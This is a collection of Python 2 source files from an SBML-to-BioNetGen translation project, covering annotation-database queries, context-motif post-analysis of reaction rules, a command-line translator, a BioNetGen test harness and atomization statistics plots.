return parser
def query(database, queryType, queryOptions):
db = NamingDatabase(database)
#db.getAnnotationsFromSpecies('EGFR')
#db.getSpeciesFromAnnotations('http://identifiers.org/uniprot/P00533')
#print db.getSpeciesFromFileName('BIOMD0000000048.xml')
try:
if Query[queryType] == Query.species:
if queryOptions is None:
print "Species query must indicate a species to search for using the '-s' flag"
return
selectedFiles = db.getFileNameFromSpecies(queryOptions)
result = db.findOverlappingNamespace(selectedFiles)
elif Query[queryType] == Query.organism:
if queryOptions is not None:
selectedFiles = db.getFileNameFromOrganism(queryOptions)
if selectedFiles != []:
result = db.findOverlappingNamespace(selectedFiles)
else:
result = []
else:
result = {}
organismNames = db.getOrganismNames()
for organism in organismNames:
selectedFiles = db.getFileNameFromOrganism(organism)
print organism, len(selectedFiles)
result[organism] = db.findOverlappingNamespace(selectedFiles)
elif Query[queryType] == Query.family:
result = {}
if queryOptions is None:
selectedFiles = []
for family in organismFamilies:
selectedFiles.extend(db.getFileNameFromSpecies(family))
result['mammalsFamily'] = db.findOverlappingNamespace(selectedFiles)
elif Query[queryType] == Query.all:
result = db.findOverlappingNamespace([])
#pprint.pprint([[x['name'], len(x['fileName'])] for x in result])
import pickle
with open('results2.dump', 'wb') as f:
pickle.dump(result, f)
except KeyError:
print 'Query operation not supported'
if __name__ == "__main__":
parser = defineConsole()
namespace = parser.parse_args()
if namespace.query:
query(namespace.database, namespace.query, namespace.specific_query)
else:
if namespace.create:
setupDatabase(namespace.database)
if namespace.input_file:
userDefinitions = namespace.user_conventions
populateDatabaseFromFile(namespace.input_file, namespace.database, userDefinitions)
if namespace.directory:
sbmlFiles = getFiles(namespace.directory, 'xml')
progress = progressbar.ProgressBar(maxval=len(sbmlFiles)).start()
for idx in progress(range(len(sbmlFiles))):
populateDatabaseFromFile(sbmlFiles[idx], namespace.database, None)
```
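A minimal usage sketch for the naming-database module above; the database file and model name are placeholders:
```python
from namingDatabase import NamingDatabase, setupDatabase, populateDatabaseFromFile

DATABASE = 'annotations.db'    # hypothetical SQLite database file
MODEL = 'BIOMD0000000048.xml'  # hypothetical curated SBML model

setupDatabase(DATABASE)                    # create the empty tables once
populateDatabaseFromFile(MODEL, DATABASE)  # extract and store its annotations

db = NamingDatabase(DATABASE)
files = db.getFileNameFromSpecies('EGFR')    # models mentioning this species
groups = db.findOverlappingNamespace(files)  # merge names that share annotations
```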
#### File: SBMLparser/rulifier/postAnalysis.py
```python
import componentGroups
import argparse
import pprint
from collections import defaultdict
import itertools
from copy import copy
from utils import readBNGXML
import functools
import marshal
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = marshal.dumps([args, kwargs])
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
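# Example (hypothetical): any function whose arguments can be marshalled may be
# cached this way, e.g.
#   @memoize
#   def composition(dependencyGraph, moleculeSet): ...
# Repeated calls with identical arguments then return the cached result.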
@memoize
def resolveEntry(dependencyGraph, moleculeSet):
"""
resolve an entry to its basic components according to dependency graph
>>> dependencyGraph = {'EGF_EGFR_2':[['EGF_EGFR','EGF_EGFR']],'EGF_EGFR':[['EGF','EGFR']],'EGFR':[],'EGF':[]}
>>> resolveEntry(dependencyGraph, ['EGF_EGFR_2'])
['EGF', 'EGFR', 'EGF', 'EGFR']
"""
if type(moleculeSet) == str:
return [moleculeSet]
if len(moleculeSet) == 1 and dependencyGraph[moleculeSet[0]] == []:
return moleculeSet
compositionList = []
for molecule in moleculeSet:
if len(dependencyGraph[molecule]) == 0:
compositionList.append(molecule)
else:
compositionList.extend(resolveEntry(dependencyGraph, dependencyGraph[molecule][0]))
return compositionList
class ModelLearning:
def __init__(self, fileName,rawFileName=None):
self.molecules, self.rules, _ = readBNGXML.parseXML(fileName)
self.dependencies, self.patternXreactions, _, _ = componentGroups.getContextRequirements(fileName, collapse=False)
self.transposePatternsReactions()
self.reverseDependencies = componentGroups.reverseContextDict(self.dependencies)
self.moleculeMotifDict, self.motifMoleculeDict = self.classifyPairsByMotif(self.reverseDependencies)
if rawFileName:
self.processRawSBML(rawFileName)
else:
self.rawRules = {}
def processRawSBML(self,inputfile):
_, rawrules, _ = readBNGXML.parseXML(inputfile)
self.rawRules = {x[0].label: x[0] for x in rawrules}
def transposePatternsReactions(self):
self.reactionsXpatterns = defaultdict(lambda: defaultdict(lambda: defaultdict(list)))
for product in self.patternXreactions:
for reactionCenter in self.patternXreactions[product]:
for contextcomponent in self.patternXreactions[product][reactionCenter]:
for contextState in self.patternXreactions[product][reactionCenter][contextcomponent]:
for reaction in self.patternXreactions[product][reactionCenter][contextcomponent][contextState]:
self.reactionsXpatterns[reaction][product][reactionCenter].append((contextcomponent, contextState))
def classifyPairsByMotif(self, reverseDependencies):
"""
receives a dict arranged by molecule->componentPair->dependency and
organizes molecule pairs by a concept called 'motif'
"""
motifDependencies = defaultdict(lambda: defaultdict(list))
motifDependencies2 = defaultdict(lambda: defaultdict(list))
for molecule in reverseDependencies:
for moleculePair in reverseDependencies[molecule]:
motifDependencies[molecule][frozenset(moleculePair)].append(reverseDependencies[molecule][moleculePair])
for molecule in motifDependencies:
for moleculePair in motifDependencies[molecule]:
requirementPair = tuple(sorted(motifDependencies[molecule][moleculePair]))
motifDependencies2[requirementPair][molecule].append(moleculePair)
return motifDependencies, motifDependencies2
def getMotifFromPair(self, molecule, component1, component2):
return self.moleculeMotifDict[molecule][frozenset([component1, component2])]
def getParticipatingReactions(self, molecule, componentPair, reactionDictionary):
correlationList = {}
for moleculeName in reactionDictionary:
if moleculeName.startswith(molecule + '%'):
for component in reactionDictionary[moleculeName]:
if component[0] in componentPair and (component[1] == 1 or component[2] not in ['0', 0, '']):
for componentComplement in [x for x in reactionDictionary[moleculeName][component] if x in componentPair]:
correlationList[(component[0], componentComplement)] = (reactionDictionary[moleculeName][component][componentComplement])
return correlationList
def getPairsFromMotif(self, motif1, motif2, excludedComponents):
moleculeCorrelationList = defaultdict(dict)
for element in self.motifMoleculeDict:
if motif1 in element and motif2 in element:
if motif1 == motif2 and len([x for x in element if x == motif1]) < 2:
continue
for molecule in self.motifMoleculeDict[element]:
correlationList = {}
if len(self.motifMoleculeDict[element][molecule]) > 0:
for componentPair in self.motifMoleculeDict[element][molecule]:
if not any(x in excludedComponents for x in componentPair):
correlationList[componentPair] = self.getParticipatingReactions(molecule, componentPair, self.patternXreactions)
moleculeCorrelationList[molecule].update(correlationList)
return dict(moleculeCorrelationList)
def analyzeRedundantBonds(self, assumptions):
"""
Analyzes a system of molecules with redundant bonds between them (more than one path between any two nodes in the system). The function
attempts to score the bonds by looking for partial competition relationships (e.g. the presence of one component
excludes the activation of another, but in the other direction we see independence), which are less likely to occur than a full independence
relationship. The method will thus nominate such edges for deletion if the overall system still forms
a fully connected graph after the bond removal.
"""
def fullyConnectedGraph(nodes, edges):
"""
Lazy implementation. This only works if there is one common element to all subgraphs
"""
if edges == []:
return False
tmpNodeList = [set(x) for x in edges]
superGraph = set.intersection(*map(set, edges))
if len(superGraph) > 0:
return True
return False
conserveBonds = []
deleteBonds = {}
for redundantBondSet in assumptions:
allBonds = [sorted(x) for x in itertools.combinations(redundantBondSet, 2)]
conserveBonds = []
for molecule in redundantBondSet:
for x in itertools.combinations([x for x in redundantBondSet if x != molecule], 2):
contextMotif = self.getMotifFromPair(molecule, x[0].lower(), x[1].lower())
if ('independent' in contextMotif and not ('requirement' in contextMotif or 'nullrequirement' in contextMotif)) \
or set(contextMotif) == set(['requirement', 'nullrequirement']):
conserveBonds.append(sorted([molecule, x[0]]))
conserveBonds.append(sorted([molecule, x[1]]))
if fullyConnectedGraph(redundantBondSet, conserveBonds):
deleteBonds[redundantBondSet] = [x for x in allBonds if x not in conserveBonds]
return deleteBonds
def scoreHypotheticalBonds(self, assumptions):
"""
TODO: we need some way to evaluate the confidence in a bond based on context information
"""
pass
def getDifference(self, pattern1, pattern2, translator):
if pattern1 not in translator or pattern2 not in translator:
return None
species1 = translator[pattern1]
species2 = translator[pattern2]
species1.sort()
species2.sort()
componentDifference = []
for molecule1,molecule2 in zip(species1.molecules,species2.molecules):
for component1,component2 in zip(molecule1.components,molecule2.components):
if len(component1.bonds) != len(component2.bonds) or component1.activeState != component2.activeState:
componentDifference.append(component1.name)
return componentDifference
def processContextMotifInformation(self, assumptionList, database):
def getClassification(keys, translator):
flags = [key in [x.lower() for x in translator.keys()] for key in keys]
if all(flags):
return 'binding-binding'
elif any(flags):
return 'modification-binding'
return 'modification-modification'
motifInformationDict = self.getContextMotifInformation()
motifFinalLog = defaultdict(set)
motifReactionDefinitions = {}
for motifInformation in motifInformationDict:
# iterate over motifs that are known to be problematic
if motifInformation in [frozenset(['nullrequirement', 'independent']), frozenset(['requirement', 'independent'])]:
for molecule in motifInformationDict[motifInformation]:
if len(motifInformationDict[motifInformation][molecule]) == 0:
continue
# if the candidate definitions for a given compound are related to a molecule with problematic motifs
for assumption in (x for x in assumptionList for y in eval(x[3][1]) for z in y if molecule in z):
candidates = eval(assumption[1][1])
alternativeCandidates = eval(assumption[2][1])
original = eval(assumption[3][1])
# further confirm that the change is about the pair of interest
# by iterating over all candidates and comparing one by one
for candidate in candidates:
for alternativeCandidate in alternativeCandidates:
difference = [x for x in candidate if x not in alternativeCandidate]
difference.extend([x for x in alternativeCandidate if x not in candidate])
# if we are referencing a molecule that is not about this particular context change
# dont store it in the motif/species table, just keep information about the motif alone
localAnalysisFlag = True
if not any([molecule in database.prunnedDependencyGraph[x][0] if
len(database.prunnedDependencyGraph[x]) > 0 else molecule
in x for x in difference]):
localAnalysisFlag = False
# continue
if localAnalysisFlag:
# get those elements that differ between the two candidates and that correspond to the current <molecule> being analyzed
difference = [x for x in candidate if x not in alternativeCandidate and resolveEntry(database.prunnedDependencyGraph, [x])[0] == molecule]
alternativeDifference = [x for x in alternativeCandidate if x not in candidate and molecule in resolveEntry(database.prunnedDependencyGraph, [x])[0]]
# get the difference patterns for the two species
if not difference or not alternativeDifference:
continue
componentDifference = self.getDifference(difference[0], alternativeDifference[0], database.translator)
# make sure that the current motif candidate intersects with the difference pattern
for keys in motifInformationDict[motifInformation][molecule]:
if localAnalysisFlag and any(key in componentDifference for key in keys):
motifFinalLog['{0}({1})'.format(molecule, ', '.join(keys))].add(assumption[0])
classification = getClassification(keys, database.translator)
if classification not in motifReactionDefinitions:
motifReactionDefinitions[classification] = {}
motifReactionDefinitions[classification]['{0}({1})'.format(molecule, ', '.join(keys))] = (motifInformation, motifInformationDict[motifInformation][molecule][keys])
#pprint.pprint(dict(motifFinalLog))
#pprint.pprint(motifReactionDefinitions)
return motifFinalLog, motifReactionDefinitions
def getContextMotifInformation(self):
'''
returns the reactions in the system classified by context-component motif pairs. E.g. a (requirement, nullrequirement)
motif pair is a pair of components A->B such that B requires A to be active in order to activate, whereas A requires B
to be inactive in order to activate.
'''
relationshipCombinations = itertools.combinations(['independent', 'requirement', 'nullrequirement', 'exclusion'], 2)
motifDictionary = {}
for relCombi in relationshipCombinations:
motifDictionary[frozenset(relCombi)] = self.getPairsFromMotif(relCombi[0], relCombi[1], [])
for requirementClass in ['independent', 'requirement', 'nullrequirement', 'exclusion']:
motifDictionary[frozenset([requirementClass, requirementClass])] = self.getPairsFromMotif(requirementClass, requirementClass, [])
return motifDictionary
def getComplexReactions(self, threshold=2):
complexRules = []
for rule in self.rules:
if len([x for x in rule[0].actions if x.action not in ['ChangeCompartment']]) >= threshold:
complexRules.append(rule)
return complexRules
def analyzeComplexReactions(self, threshold=2):
def getActionableComponentPartners(actions, molecule):
actionableComponents = []
for action in actions:
if action[1] and action[1] in molecule.lower():
actionableComponents.append(action[2])
if action[2] and action[2] in molecule.lower():
actionableComponents.append(action[1])
return actionableComponents
for reaction in self.getComplexReactions():
#analyze reactions with cis-allostery (e.g. two action sites are on the same molecule)
if len([x for x in self.reactionsXpatterns[reaction[0].label] if len(self.reactionsXpatterns[reaction[0].label][x]) > 1]) ==0:
continue
print '----------'
if reaction[0].label in self.rawRules:
print str(self.rawRules[reaction[0].label])
print '>>>>>>'
print str(reaction[0])
else:
print str(reaction[0].label)
#print str(reaction[0])
resolvedActions = []
print 'Actions:'
changeFlag = 0
for action in reaction[0].actions:
molecule1 = reaction[-3]['_'.join(action.site1.split('_')[:-1])] if action.site1 else ''
molecule2 = reaction[-3]['_'.join(action.site2.split('_')[:-1])] if action.site2 else ''
site1 = reaction[-3][action.site1] if action.site1 else ''
site2 = reaction[-3][action.site2] if action.site2 else ''
print '\t{0}= {1}({2}), {3}({4})'.format(action.action,molecule1,site1,molecule2,site2)
if action.action == 'DeleteBond':
changeFlag = 1
resolvedActions.append([action.action,site1,site2])
print 'Context:'
for reactionCenter in self.reactionsXpatterns[reaction[0].label]:
#cis rules
if len(self.reactionsXpatterns[reaction[0].label][reactionCenter]) > 1:
for state in self.reactionsXpatterns[reaction[0].label][reactionCenter]:
#we will focus on statechange actions for now
if state[2] not in ['']:
#print self.patternXreactions[reactionCenter]
actionableComponents = getActionableComponentPartners([x for x in resolvedActions if x[0] in ['AddBond', 'DeleteBond']],reactionCenter)
for component in actionableComponents:
print '\treaction center <{0}>, context <{1}> in molecule <{2}>:'.format(component,state[0],reactionCenter)
print '\t', {x: dict(self.patternXreactions[reactionCenter][(component, changeFlag, '')][x]) \
for x in self.patternXreactions[reactionCenter][(component, changeFlag, '')] if x in [state[0],state[0].lower()]}
print '+++++++++'
def defineConsole():
"""
defines the program console line commands
"""
parser = argparse.ArgumentParser(description='SBML to BNGL translator')
parser.add_argument('-i', '--input', type=str, help='sbml file')
parser.add_argument('-r', '--raw', type=str, help='raw sbml file')
parser.add_argument('-t','--tests',action='store_true',help='run unit tests')
return parser
def runTests():
import doctest
doctest.testmod()
if __name__ == "__main__":
parser = defineConsole()
namespace = parser.parse_args()
if namespace.tests:
runTests()
exit()
inputFile = namespace.input
modelLearning = ModelLearning(namespace.input, namespace.raw)
#print modelLearning.getMotifFromPair('EGFR','grb2','shc')
#print modelLearning.getMotifFromPair('Shc','grb2','egfr')
#modelLearning.analyzeComplexReactions()
#for rule in complexRules:
# print str(rule[0])
relationshipCombinations = itertools.combinations(['independent', 'requirement', 'nullrequirement', 'exclusion'], 2)
motifDictionary = {}
for relCombi in relationshipCombinations:
motifDictionary[relCombi] = modelLearning.getPairsFromMotif(relCombi[0], relCombi[1],['imod'])
if len(motifDictionary[relCombi]) > 0:
print relCombi, {x:len(motifDictionary[relCombi][x]) for x in motifDictionary[relCombi]}
for requirementClass in ['independent', 'requirement', 'nullrequirement', 'exclusion']:
motifDictionary[(requirementClass,requirementClass)] = modelLearning.getPairsFromMotif(requirementClass, requirementClass, ['imod'])
if len(motifDictionary[(requirementClass, requirementClass)]) > 0:
print (requirementClass, requirementClass), {x:len(motifDictionary[(requirementClass,requirementClass)][x]) for x in motifDictionary[(requirementClass,requirementClass)]}
print modelLearning.getPairsFromMotif('independent','requirement',['imod'])
print '---'
#print modelLearning.getPairsFromMotif('independent','nullrequirement',['imod'])
```
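A short usage sketch for the post-analysis module above, assuming `model.xml` is a BNG-XML file produced by the translator (the file, molecule, and component names are placeholders):
```python
from postAnalysis import ModelLearning

learner = ModelLearning('model.xml')  # hypothetical BNG-XML input

# context motif shared by two components of one molecule, e.g. ['independent']
print(learner.getMotifFromPair('EGFR', 'grb2', 'shc'))

# molecule pairs mixing independence and requirement, ignoring 'imod' components
pairs = learner.getPairsFromMotif('independent', 'requirement', ['imod'])
print(len(pairs))
```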
#### File: source_Atomizer/SBMLparser/sbmlTranslator.py
```python
import libsbml2bngl as ls2b
import argparse
import yaml
def defineConsole():
parser = argparse.ArgumentParser(description='SBML to BNGL translator')
parser.add_argument('-i', '--input-file', type=str, help='input SBML file', required=True)
parser.add_argument('-t', '--annotation', action='store_true', help='keep annotation information')
parser.add_argument('-o', '--output-file', type=str, help='output SBML file')
parser.add_argument('-c', '--convention-file', type=str, help='Conventions file')
parser.add_argument('-n', '--naming-conventions', type=str, help='Naming conventions file')
parser.add_argument('-u', '--user-structures', type=str, help='User defined species')
parser.add_argument('-id', '--molecule-id', action='store_true', help='use SBML molecule ids instead of names. IDs are less descriptive but more bngl friendly. Use only if the generated BNGL has syntactic errors')
parser.add_argument('-nc','--no-conversion', action='store_true', help='do not convert units. Copy straight from sbml to bngl')
parser.add_argument('-a', '--atomize', action='store_true', help='Infer molecular structure')
parser.add_argument('-p', '--pathwaycommons', action='store_true', help='Use pathway commons to infer molecule binding. This setting requires an internet connection and will query the pathway commons web service.')
parser.add_argument('-b', '--bionetgen-analysis', type=str, help='Set the BioNetGen path for context post analysis.')
parser.add_argument('-s','--isomorphism-check', action='store_true', help='disallow atomizations that produce the same graph structure')
parser.add_argument('-I','--ignore', action='store_true', help='ignore atomization translation errors')
return parser
def checkInput(namespace):
options = {}
options['inputFile'] = namespace.input_file
conv, useID, naming = ls2b.selectReactionDefinitions(options['inputFile'])
options['outputFile'] = namespace.output_file if namespace.output_file is not None else options['inputFile'] + '.bngl'
options['conventionFile'] = namespace.convention_file if namespace.convention_file is not None else conv
options['userStructure'] = namespace.user_structures
options['namingConventions'] = namespace.naming_conventions if namespace.naming_conventions is not None else naming
options['useId'] = namespace.molecule_id
options['annotation'] = namespace.annotation
options['atomize'] = namespace.atomize
options['pathwaycommons'] = namespace.pathwaycommons
options['bionetgenAnalysis'] = namespace.bionetgen_analysis
options['isomorphismCheck'] = namespace.isomorphism_check
options['ignore'] = namespace.ignore
options['noConversion'] = namespace.no_conversion
return options
def main():
parser = defineConsole()
namespace = parser.parse_args()
options = checkInput(namespace)
returnArray = ls2b.analyzeFile(options['inputFile'], options['conventionFile'], options['useId'], options['namingConventions'],
options['outputFile'], speciesEquivalence=options['userStructure'],
atomize=options['atomize'], bioGrid=False, pathwaycommons=options['pathwaycommons'], ignore=options['ignore'], noConversion = options['noConversion'])
if namespace.bionetgen_analysis and returnArray:
ls2b.postAnalyzeFile(options['outputFile'], namespace.bionetgen_analysis, returnArray.database)
if namespace.annotation and returnArray:
with open(options['outputFile'] + '.yml', 'w') as f:
f.write(yaml.dump(returnArray.annotation, default_flow_style=False))
if __name__ == "__main__":
main()
```
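The command-line wrapper above ultimately calls `ls2b.analyzeFile`; the same translation can be driven programmatically. A hedged sketch mirroring the defaults assembled in `checkInput` (the input file name is a placeholder):
```python
import libsbml2bngl as ls2b

inputFile = 'BIOMD0000000048.xml'  # hypothetical SBML input
conv, useID, naming = ls2b.selectReactionDefinitions(inputFile)

ls2b.analyzeFile(inputFile, conv, False, naming,
                 inputFile + '.bngl',  # default output name, as in checkInput
                 speciesEquivalence=None, atomize=True, bioGrid=False,
                 pathwaycommons=False, ignore=False, noConversion=False)
```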
#### File: SBMLparser/testing/evaluate.py
```python
from os import listdir
from os.path import isfile, join
import os
import subprocess
import time
import datetime
import signal
def evaluate(fileName):
timeout = 30
with open('temp.tmp', "w") as outfile:
d = open('dummy.tmp','w')
start = datetime.datetime.now()
result = subprocess.Popen(['bngdev', './' + fileName],stderr=outfile,stdout=d)
#result = subprocess.Popen(['bngdev', './' + fileName],stderr=outfile,stdout=d)
while result.poll() is None:
time.sleep(0.1)
now = datetime.datetime.now()
if (now - start).seconds > timeout:
os.kill(result.pid, signal.SIGKILL)
os.waitpid(-1, os.WNOHANG)
subprocess.call(['killall','run_network'])
subprocess.call(['killall','bngdev'])
return 5
d.close()
if result.poll() > 0:
with open('temp.tmp','r') as outfile:
lines = outfile.readlines()
if 'cvode' in ','.join(lines):
return 2
elif 'ABORT: Reaction rule list could not be read because of errors' in ','.join(lines):
return 3
else:
return 4
else:
return result.poll()
def validate(fileName):
timeout = 30
with open('temp.tmp', "w") as outfile:
d = open('dummy.tmp','w')
start = datetime.datetime.now()
result = subprocess.Popen(['bngdev','--xml', './' + fileName],stderr=outfile,stdout=d)
while result.poll() is None:
time.sleep(0.1)
now = datetime.datetime.now()
if (now - start).seconds > timeout:
os.kill(result.pid, signal.SIGKILL)
os.waitpid(-1, os.WNOHANG)
#subprocess.call(['killall','run_network'])
subprocess.call(['killall','bngdev'])
return 5
d.close()
return result.poll()
def analyzeErrors(directory):
errorLog = {'delay':0,'noninteger':0,'pseudo':0,'dependency':0
,'rules':0,'others':0,'malformed':0}
onlyfiles = [ f for f in listdir('./' + directory) if isfile(join('./' + directory, f)) ]
logFiles = [x[0:-4] for x in onlyfiles if 'log' in x]
errorFiles = 0
#dont skip the files that only have warnings
for log in logFiles:
with open('./' + directory + '/' + log +'.log','r') as f:
k = f.readlines()
logText = ','.join(k)
conditions = ['delay','pseudo','natural reactions','Malformed','dependency cycle','non integer stoicheometries']
if 'ERROR' in logText:
errorFiles +=1
if 'delay' in logText and all([x not in logText for x in conditions if 'delay' != x]):
errorLog['delay'] += 1
elif 'pseudo' in logText and all([x not in logText for x in conditions if 'pseudo' != x]):
errorLog['pseudo'] += 1
elif 'natural reactions' in logText and all([x not in logText for x in conditions if 'natural reactions' != x]):
errorLog['rules'] += 1
elif 'Malformed' in logText and all([x not in logText for x in conditions if 'Malformed' != x]):
errorLog['malformed'] += 1
elif 'dependency cycle' in logText and all([x not in logText for x in conditions if 'dependency cycle' != x]):
errorLog['dependency'] += 1
elif 'non integer stoicheometries' in logText and all([x not in logText for x in conditions if 'non integer stoicheometries' != x]):
errorLog['noninteger'] += 1
else:
errorLog['others'] +=1
print errorLog,errorFiles
def createValidFileBatch(directory):
import zipfile
onlyfiles = [ f for f in listdir('./' + directory) if isfile(join('./' + directory, f)) ]
logFiles = [x[0:-4] for x in onlyfiles if x.endswith('log')]
errorFiles = []
for x in logFiles:
with open('./' + directory + '/' + x +'.log','r') as f:
k = f.readlines()
if 'ERROR' in ','.join(k):
errorFiles.append(x)
bnglFiles = [x for x in onlyfiles if x.endswith('bngl')]
validFiles = [x for x in bnglFiles if x not in errorFiles]
with zipfile.ZipFile('validComplex.zip','w') as myzip:
for bngl in validFiles:
myzip.write('./{0}/{1}'.format(directory,bngl),bngl)
def main():
directory = 'raw'
onlyfiles = [ f for f in listdir('./' + directory) if isfile(join('./' + directory,f)) ]
logFiles = [x[0:-4] for x in onlyfiles if 'log' in x]
errorFiles = []
#dont skip the files that only have warnings
for x in logFiles:
with open('./' + directory + '/' + x +'.log','r') as f:
k = f.readlines()
if 'ERROR' in ','.join(k):
errorFiles.append(x)
bnglFiles = [x for x in onlyfiles if 'bngl' in x and 'log' not in x]
validFiles = [x for x in bnglFiles if x not in errorFiles]
print 'Thrown out: {0}'.format(len(bnglFiles)-len(validFiles))
skip = [] #['334','225','332','105','293','333','337','18','409']
counter = 0
with open('executionTestErrors' + '.log', 'w') as f:
subprocess.call(['rm','./*net'])
for idx,bnglFile in enumerate(sorted(validFiles)):
#if '100.' not in bnglFile:
# continue
print bnglFile,
timeout = 30
if len([x for x in skip if x in bnglFile]) > 0:
continue
with open('temp.tmp', "w") as outfile:
d = open('dummy.tmp','w')
start = datetime.datetime.now()
result = subprocess.Popen(['bngdev', './' + directory+ '/{0}'.format(bnglFile)],stderr=outfile,stdout=d)
while result.poll() is None:
time.sleep(0.1)
now = datetime.datetime.now()
if (now - start).seconds > timeout:
os.kill(result.pid, signal.SIGKILL)
os.waitpid(-1, os.WNOHANG)
subprocess.call(['killall','run_network'])
print 'breaker',
counter -=1
break
d.close()
if result.poll() > 0:
with open('temp.tmp','r') as outfile:
lines = outfile.readlines()
tag = ''
if 'cvode' in ','.join(lines):
print '///',bnglFile
tag = 'cvode'
elif 'ABORT: Reaction rule list could not be read because of errors' in ','.join(lines):
print '\\\\\\',bnglFile
#elif 'Incorrect number of arguments' in ','.join(lines):
# print '[[]]',bnglFile
else:
print '---',bnglFile
tag = lines
f.write('%s %s\n' % (bnglFile,tag))
f.flush()
else:
counter += 1
print '+++',bnglFile
print counter
if __name__ == "__main__":
#main()
#analyzeErrors('complex')
createValidFileBatch('complex')
```
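For reference, `evaluate` above signals its outcome through an integer return code; a small mapping read directly from its branches:
```python
# Return codes produced by evaluate(), as read from the branches above.
EVALUATE_CODES = {
    0: 'simulation completed',
    2: 'cvode integration error',
    3: 'reaction rule list could not be read',
    4: 'other BioNetGen error',
    5: 'killed after the 30 s timeout',
}

def describe(code):
    return EVALUATE_CODES.get(code, 'unknown return code {0}'.format(code))
```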
#### File: source_Atomizer/stats/atomizationStatistics.py
```python
import pandas
from scipy import stats
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import progressbar
from richContactMap import reactionBasedAtomization, stoichiometryAnalysis, extractActiveMolecules, getValidFiles
import readBNGXML
from collections import Counter
import SBMLparser.utils.annotationExtractor as annEx
from scipy.stats import kendalltau
sns.set_style("white")
def constructHistogram(data, fileName, xlabel, ylabel, bins=10):
"""
constructs a histogram based on the information in data
"""
_, axs = plt.subplots(1, 1, sharex=True, figsize=(8, 6))
plt.clf()
sns.set_palette("BuGn_d")
if type(bins) != int:
axs.set_xlim(xmin=0,xmax=bins[-1])
sns.distplot(data, kde=False, rug=False, bins=bins, hist_kws=dict(alpha=1))
#plt.hist(ratomization)
plt.xlabel(xlabel, fontsize=18)
plt.ylabel(ylabel, fontsize=18)
plt.savefig(fileName)
def hexbin(x, y, color, **kwargs):
cmap = sns.light_palette(color, as_cmap=True)
plt.hexbin(x, y, gridsize=15, cmap=cmap, **kwargs)
def create2DdensityPlot(dataframe, columns, axisNames, outputfilename, plotType=sns.kdeplot, xlim=(0, 1), ylim=(0, 1)):
"""
creates a 2d density plot given a dataframe and two columns.
saves the image in <outputfilename>
"""
plt.clf()
_, _ = plt.subplots(1, 1, sharex=True, figsize=(8, 6))
g = sns.JointGrid(columns[0], columns[1], dataframe, xlim=xlim, ylim=ylim, space=0)
g.plot_marginals(sns.distplot, color="g", bins=None)
g.plot_joint(plotType, cmap="Greens", shade=True, n_levels=20)
g.set_axis_labels(axisNames[0], axisNames[1])
#ax = g.ax_joint
#ax.set_xscale('log')
#ax.set_yscale('log')
#g.ax_marg_x.set_xscale('log')
#g.ax_marg_y.set_yscale('log')
g.annotate(stats.pearsonr)
plt.savefig(outputfilename)
def createHexBin(dataframe,columns,axisnames,outputfilename,xlim=(0,1),ylim=(0,1)):
plt.clf()
g = sns.JointGrid(columns[0], columns[1], dataframe, space=0)
g.ax_marg_x.hist(dataframe[columns[0]], bins=np.arange(xlim[0], xlim[1]))
g.ax_marg_y.hist(dataframe[columns[1]], bins=np.arange(ylim[0], ylim[1]), orientation="horizontal")
#g.ax_marg_x.hist(x, bins=np.arange(0, 60)
#g.ax_marg_y.hist(y, bins=np.arange(0, 1000, 10), orientation="horizontal")
g.plot_joint(plt.hexbin, gridsize=25, extent=[xlim[0], xlim[1], ylim[0], ylim[1]], cmap="Blues")
#g.fig.savefig("/Users/mwaskom/Desktop/jointgrid.png", bbox_inches="tight")
#f, _ = plt.subplots(1, 1, sharex=True, figsize=(8, 6))
#g = sns.JointGrid(columns[0], columns[1], dataframe, xlim=xlim, ylim=ylim, space = 0)
#g.plot_marginals(sns.distplot, color="g")
#g.plot_joint(plt.hexbin, cmap="Greens", extent=[0, np.max(dataframe[columns[0]]), 0, np.max(dataframe[columns[1]])])
#g.annotate(stats.pearsonr)
#sns.jointplot(dataframe[columns[0]], dataframe[columns[1]], kind="hex", stat_func=stats.pearsonr, color="g", gridsize=8)
g.fig.savefig(outputfilename)
def create1Ddensityplot(data, outputfilename):
plt.clf()
f, (ax1) = plt.subplots(1, 1, sharex=True, figsize=(8, 6))
# with sns.axes_style("white"):
#sns.jointplot("compression", "wiener index",atomizationInfo, kind="kde");
sns.kdeplot(data, shade=True, ax=ax1, clip=(0, 1), bw=0.5)
plt.savefig(outputfilename)
def reactionBasedAtomizationDistro(directory):
'''
calculates a reaction-atomization-based metric:
ratio of atomized reactions (non syn-del) in a model
'''
syndelArray = []
atomizedDistro = []
nonAtomizedDistro = []
atomizationDB = pandas.DataFrame()
# generate bng-xml
# generateBNGXML(directory)
print 'reading bng-xml files'
xmlFiles = getValidFiles(directory, 'xml')
print 'analyzing {0} bng-xml files'.format(len(xmlFiles))
progress = progressbar.ProgressBar()
validFiles = 0
for i in progress(range(len(xmlFiles))):
xml = xmlFiles[i]
# for xml in xmlFiles:
try:
# console.bngl2xml('complex/output{0}.bngl'.format(element),timeout=10)
try:
structures = readBNGXML.parseFullXML(xml)
rules = structures['rules']
observables = structures['observables']
molecules = structures['molecules']
except IOError:
print xml
continue
atomizedProcesses, weight = reactionBasedAtomization(rules)
ato, nonato = stoichiometryAnalysis(rules)
atomizedDistro.extend(ato)
nonAtomizedDistro.extend(nonato)
# if (2,1) in nonato:
# interesting.append(element)
score = atomizedProcesses * 1.0 / weight if weight != 0 else 0
#totalRatomizedProcesses += atomizedProcesses
#totalReactions += len(rules)
#totalProcesses += weight
# calculate yield
activeMolecules = extractActiveMolecules(rules)
activeMoleculeTypes = [x for x in molecules if x.name in activeMolecules]
yieldValue = len([x for x in activeMoleculeTypes if len(
x.components) > 0]) * 1.0 / len(activeMoleculeTypes) if len(activeMoleculeTypes) > 0 else 0
# syndel value
syndelValue = 1 - (len(rules) - weight) * 1.0 / len(rules) if len(rules) > 0 else 0
atomizationDB.set_value(xml, 'score', score)
atomizationDB.set_value(xml, 'weight', weight)
atomizationDB.set_value(xml, 'length', len(rules))
atomizationDB.set_value(xml, 'yild', yieldValue)
atomizationDB.set_value(xml, 'syndel', syndelValue)
atomizationDB.set_value(xml, 'numspecies', len(observables))
validFiles += 1
except IOError:
print 'io'
continue
print 'found {0} models I could extract info from'.format(validFiles)
return atomizationDB
def extractAnnotationsFromModelSet(modelList):
modelAnnotationsCounter = Counter()
for model in modelList:
annotationExtractor = annEx.AnnotationExtractor(model)
modelAnnotations = annotationExtractor.getModelAnnotations()
